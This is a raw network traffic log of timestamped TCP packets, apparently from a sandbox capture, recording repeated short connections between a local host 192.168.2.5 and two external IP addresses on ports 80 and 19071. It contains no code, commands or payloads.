Jul 27, 2023 01:34:23.557128906 CEST	80	50021	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:23.557209015 CEST	50021	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.606477976 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:23.632477999 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:23.651290894 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:23.651381969 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:23.651541948 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:23.670643091 CEST	50021	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.676512003 CEST	50022	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.677432060 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:23.677525043 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:23.677571058 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:23.696379900 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:23.696754932 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:23.715126991 CEST	80	50021	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:23.715435982 CEST	50021	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.721266985 CEST	80	50022	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:23.721432924 CEST	50022	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.721776962 CEST	50022	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.722651005 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:23.722815990 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:23.747900009 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:23.763456106 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:23.766124010 CEST	80	50022	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:23.771517992 CEST	80	50022	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:23.771682978 CEST	50022	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.799197912 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:23.844234943 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:23.876491070 CEST	50022	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.877278090 CEST	50023	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.888514042 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:23.909315109 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:23.921080112 CEST	80	50022	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:23.921895981 CEST	80	50023	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:23.921955109 CEST	50022	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.922007084 CEST	50023	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.925955057 CEST	50023	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.954215050 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:23.970457077 CEST	80	50023	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:23.975224018 CEST	80	50023	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:23.975307941 CEST	50023	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.997850895 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:24.076849937 CEST	50023	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.077733994 CEST	50024	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.092295885 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:24.121334076 CEST	80	50023	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:24.121946096 CEST	50023	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.122029066 CEST	80	50024	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:24.122140884 CEST	50024	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.122653961 CEST	50024	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.144224882 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:24.166872978 CEST	80	50024	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:24.171263933 CEST	80	50024	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:24.172461987 CEST	50024	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.185453892 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:24.286108017 CEST	50024	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.287754059 CEST	50025	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.330604076 CEST	80	50024	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:24.331238031 CEST	50024	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.332537889 CEST	80	50025	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:24.332691908 CEST	50025	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.338424921 CEST	50025	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.383263111 CEST	80	50025	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:24.387618065 CEST	80	50025	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:24.387737036 CEST	50025	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.434962034 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:24.479832888 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:24.480251074 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:24.500103951 CEST	50025	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.500473976 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:24.503451109 CEST	50026	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.545047998 CEST	80	50025	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:24.545084953 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:24.545166969 CEST	50025	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.547960997 CEST	80	50026	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:24.548057079 CEST	50026	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.548702955 CEST	50026	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.591705084 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:24.593441010 CEST	80	50026	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:24.597551107 CEST	80	50026	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:24.597723961 CEST	50026	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.645114899 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:24.691561937 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:24.732311964 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:24.740690947 CEST	50026	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.741501093 CEST	50027	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.785420895 CEST	80	50026	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:24.785511017 CEST	50026	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.785681963 CEST	80	50027	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:24.785774946 CEST	50027	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.786272049 CEST	50027	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.830454111 CEST	80	50027	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:24.835278988 CEST	80	50027	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:24.835391045 CEST	50027	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.952251911 CEST	50027	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.953212023 CEST	50028	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.996747971 CEST	80	50027	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:24.996901989 CEST	50027	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.997145891 CEST	80	50028	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:24.997234106 CEST	50028	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:24.998605967 CEST	50028	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.042673111 CEST	80	50028	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:25.047175884 CEST	80	50028	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:25.047259092 CEST	50028	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.155191898 CEST	50028	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.156061888 CEST	50029	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.199369907 CEST	80	50028	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:25.199471951 CEST	50028	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.200691938 CEST	80	50029	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:25.200809002 CEST	50029	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.207689047 CEST	50029	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.252460003 CEST	80	50029	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:25.257458925 CEST	80	50029	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:25.257668018 CEST	50029	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.389813900 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:25.395248890 CEST	50029	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.396009922 CEST	50030	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.435115099 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:25.439902067 CEST	80	50029	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:25.440016985 CEST	50029	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.440232038 CEST	80	50030	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:25.440316916 CEST	50030	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.440679073 CEST	50030	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.482391119 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:25.484919071 CEST	80	50030	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:25.490322113 CEST	80	50030	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:25.490463018 CEST	50030	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.636322021 CEST	50030	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.643723011 CEST	50031	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.681165934 CEST	80	50030	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:25.681281090 CEST	50030	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.688513994 CEST	80	50031	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:25.688637018 CEST	50031	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.691427946 CEST	50031	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.725549936 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:25.736179113 CEST	80	50031	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:25.740819931 CEST	80	50031	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:25.740902901 CEST	50031	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.770771980 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:25.775895119 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:25.820986032 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:25.870877981 CEST	50031	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.872082949 CEST	50032	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.873044014 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:25.915642023 CEST	80	50031	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:25.915791988 CEST	50031	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.916799068 CEST	80	50032	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:25.916924000 CEST	50032	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.917424917 CEST	50032	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:25.961982012 CEST	80	50032	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:25.966634035 CEST	80	50032	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:25.966730118 CEST	50032	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.077604055 CEST	50032	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.078560114 CEST	50033	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.098117113 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:26.122490883 CEST	80	50032	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:26.122594118 CEST	50032	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.122980118 CEST	80	50033	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:26.123078108 CEST	50033	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.124155045 CEST	50033	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.144119978 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:26.164587975 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:26.168529987 CEST	80	50033	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:26.173513889 CEST	80	50033	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:26.173602104 CEST	50033	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.209554911 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:26.227715969 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:26.272923946 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:26.280797958 CEST	50033	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.281644106 CEST	50034	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.325395107 CEST	80	50033	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:26.325582981 CEST	50033	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.326062918 CEST	80	50034	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:26.326247931 CEST	50034	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.326309919 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:26.340091944 CEST	50034	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.384603024 CEST	80	50034	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:26.389383078 CEST	80	50034	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:26.389512062 CEST	50034	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.501744986 CEST	50034	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.504726887 CEST	50035	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.546137094 CEST	80	50034	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:26.546216011 CEST	50034	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.556204081 CEST	80	50035	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:26.556339025 CEST	50035	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.556765079 CEST	50035	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.601392984 CEST	80	50035	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:26.606719017 CEST	80	50035	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:26.610162020 CEST	50035	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.733303070 CEST	50035	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.748529911 CEST	50036	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.778115988 CEST	80	50035	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:26.778656006 CEST	50035	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.793315887 CEST	80	50036	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:26.794384003 CEST	50036	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.794791937 CEST	50036	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:26.839520931 CEST	80	50036	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:26.843409061 CEST	80	50036	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:26.847912073 CEST	50036	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.009857893 CEST	50036	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.010873079 CEST	50037	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.055561066 CEST	80	50036	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.055641890 CEST	50036	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.055933952 CEST	80	50037	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.056060076 CEST	50037	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.056710005 CEST	50037	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.101058960 CEST	80	50037	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.104681015 CEST	80	50037	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.104808092 CEST	50037	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.218194962 CEST	50037	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.219079018 CEST	50038	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.262783051 CEST	80	50037	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.262866020 CEST	50037	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.263053894 CEST	80	50038	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.263978004 CEST	50038	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.266957998 CEST	50038	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.311217070 CEST	80	50038	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.314977884 CEST	80	50038	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.315270901 CEST	50038	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.440165997 CEST	50038	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.441016912 CEST	50039	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.484602928 CEST	80	50038	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.485379934 CEST	80	50039	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.485483885 CEST	50038	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.485551119 CEST	50039	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.492252111 CEST	50039	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.536645889 CEST	80	50039	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.541235924 CEST	80	50039	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.541985035 CEST	50039	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.656203032 CEST	50039	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.659704924 CEST	50040	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.700634003 CEST	80	50039	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.700761080 CEST	50039	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.704509020 CEST	80	50040	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.705091000 CEST	50040	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.706506014 CEST	50040	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.751351118 CEST	80	50040	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.755167961 CEST	80	50040	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.755325079 CEST	50040	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.871720076 CEST	50040	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.872412920 CEST	50041	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.916738987 CEST	80	50040	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.916805029 CEST	80	50041	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.916896105 CEST	50040	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.916934967 CEST	50041	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.917309046 CEST	50041	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:27.961703062 CEST	80	50041	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.968139887 CEST	80	50041	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:27.969197035 CEST	50041	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.090262890 CEST	50041	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.090915918 CEST	50042	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.136236906 CEST	80	50041	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:28.136329889 CEST	50041	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.136455059 CEST	80	50042	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:28.136550903 CEST	50042	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.136903048 CEST	50042	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.181255102 CEST	80	50042	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:28.186351061 CEST	80	50042	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:28.187828064 CEST	50042	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.295897961 CEST	50042	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.296669006 CEST	50043	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.342765093 CEST	80	50042	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:28.343410015 CEST	80	50043	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:28.343516111 CEST	50042	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.343561888 CEST	50043	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.376530886 CEST	50043	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.422682047 CEST	80	50043	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:28.427226067 CEST	80	50043	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:28.427314043 CEST	50043	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.530961037 CEST	50043	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.539038897 CEST	50044	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.577266932 CEST	80	50043	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:28.578167915 CEST	50043	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.585402012 CEST	80	50044	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:28.586157084 CEST	50044	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.587277889 CEST	50044	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.633831978 CEST	80	50044	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:28.638221025 CEST	80	50044	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:28.638602018 CEST	50044	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.750582933 CEST	50044	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.759241104 CEST	50045	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.795142889 CEST	80	50044	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:28.795223951 CEST	50044	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.805553913 CEST	80	50045	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:28.805664062 CEST	50045	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.807893991 CEST	50045	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.852284908 CEST	80	50045	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:28.857739925 CEST	80	50045	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:28.857805967 CEST	50045	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.997029066 CEST	50045	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:28.997698069 CEST	50046	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.042067051 CEST	80	50046	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.042126894 CEST	80	50045	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.042260885 CEST	50045	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.044090986 CEST	50046	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.059276104 CEST	50046	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.105339050 CEST	80	50046	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.109671116 CEST	80	50046	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.110843897 CEST	50046	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.232156992 CEST	50046	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.234328032 CEST	50047	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.277040005 CEST	80	50046	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.277259111 CEST	50046	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.278579950 CEST	80	50047	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.278717041 CEST	50047	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.279542923 CEST	50047	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.323990107 CEST	80	50047	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.327747107 CEST	80	50047	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.327832937 CEST	50047	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.439924002 CEST	50047	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.440582991 CEST	50048	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.486351967 CEST	80	50047	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.486460924 CEST	50047	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.487200022 CEST	80	50048	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.487412930 CEST	50048	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.490823030 CEST	50048	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.535850048 CEST	80	50048	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.539735079 CEST	80	50048	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.539875984 CEST	50048	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.607240915 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:29.652810097 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:29.659387112 CEST	50048	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.662748098 CEST	50049	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.701488018 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:29.704237938 CEST	80	50048	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.704813957 CEST	50048	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.707532883 CEST	80	50049	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.708195925 CEST	50049	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.715428114 CEST	50049	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.760314941 CEST	80	50049	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.764954090 CEST	80	50049	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.766211987 CEST	50049	80	192.168.2.5	77.91.68.61
